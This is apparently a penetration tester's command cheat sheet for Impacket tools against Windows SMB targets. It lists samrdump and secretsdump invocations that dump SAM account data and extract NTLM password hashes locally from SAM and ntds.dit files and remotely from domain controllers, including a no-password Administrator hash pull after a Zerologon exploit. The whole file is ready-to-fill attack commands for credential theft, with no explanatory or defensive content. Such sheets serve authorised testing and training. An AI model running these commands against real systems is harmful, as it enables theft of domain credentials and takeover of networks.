 % impacket, windows, smb, 445

# samrdump - system account, shares, etc... (dump info from the Security Account Manager (SAM))
samrdump.py <domain>/<user>:<password>@<ip> 

# secretsdump
secretsdump.py '<domain>/<user>:<password>'@<ip> 

# secretsdump local dump - extract hash from sam database
secretsdump.py  -system <SYSTEM_FILE|SYSTEM> -sam <SAM_FILE|SAM> LOCAL 

# secretsdump local dump - extract hash from ntds.dit
secretsdump.py  -ntds <ntds_file.dit> -system <SYSTEM_FILE> -hashes <lmhash:nthash> LOCAL -outputfile <ntlm-extract-file> 

# secretsdump - anonymous get administrator 
zerologon
secretsdump.py <domain>/<dc_bios_name>\$/@<ip> -no-pass -just-dc-user "Administrator" 

# secretsdump - remote extract
secretsdump.py -just-dc-ntlm -outputfile <ntlm-extract-file> <domain>/<user>:<password>@<ip> 

# secretsdump - remote extract + users infos
secretsdump.py -just-dc -pwd-last-set -user-status -outputfile <ntlm-extract-file> <domain>/<user>:<password>@<ip> 


